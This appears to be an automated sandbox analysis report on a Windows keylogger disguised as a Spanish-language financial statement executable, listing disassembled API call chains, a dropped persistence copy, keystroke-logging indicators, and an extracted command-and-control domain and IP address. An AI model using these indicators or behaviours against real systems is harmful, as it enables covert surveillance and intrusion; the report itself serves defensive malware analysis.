          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00410586 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_stri
ng@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_t25_2_00410586
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040728F Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$a
llocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,25_2_0040728F
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$ba
sic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA25_2_0040477E
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exeCode function: 25_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,25_2_00403325
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe | Code function: 25_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,25_2_00412BEE
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@
std@@QAE@ABV01@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$cha7_2_00403C4A

          Networking:

          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor URLs: databasepropersonombrecomercialideasearchwords.services
          Source: global traffic TCP traffic: 192.168.2.4:49745 -> 190.255.84.57:3521
          Source: Joe Sandbox View ASN Name: COLOMBIATELECOMUNICACIONESSAESPCO COLOMBIATELECOMUNICACIONESSAESPCO
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exeCode function: 7_2_00403473 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,recv,?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?data@?$basic_string@DU?$char_trai
ts@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,7_2_00403473
          Source: unknown DNS traffic detected: queries for: databasepropersonombrecomercialideasearchwords.services
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp, WerFault.exe, 00000023.00000003.743843983.0000000005530000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 0000000C.00000003.674800061.0000000005430000.00000004.00000001.sdmp, WerFault.exe, 0000001F.00000003.731406612.0000000004D10000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Contains functionality to capture and log keystrokes
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Esc] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Enter] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Tab] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Down] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Right] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Up] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Left] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [End] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [F2] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [F1] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Del] 7_2_00405EB2
          Source: C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe Code function: [Del] 7_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Esc] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Enter] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Tab] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Down] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Right] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Up] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Left] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [End] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [F2] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [F1] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Del] 25_2_00405EB2
          Source: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe Code function: [Del] 25_2_00405EB2
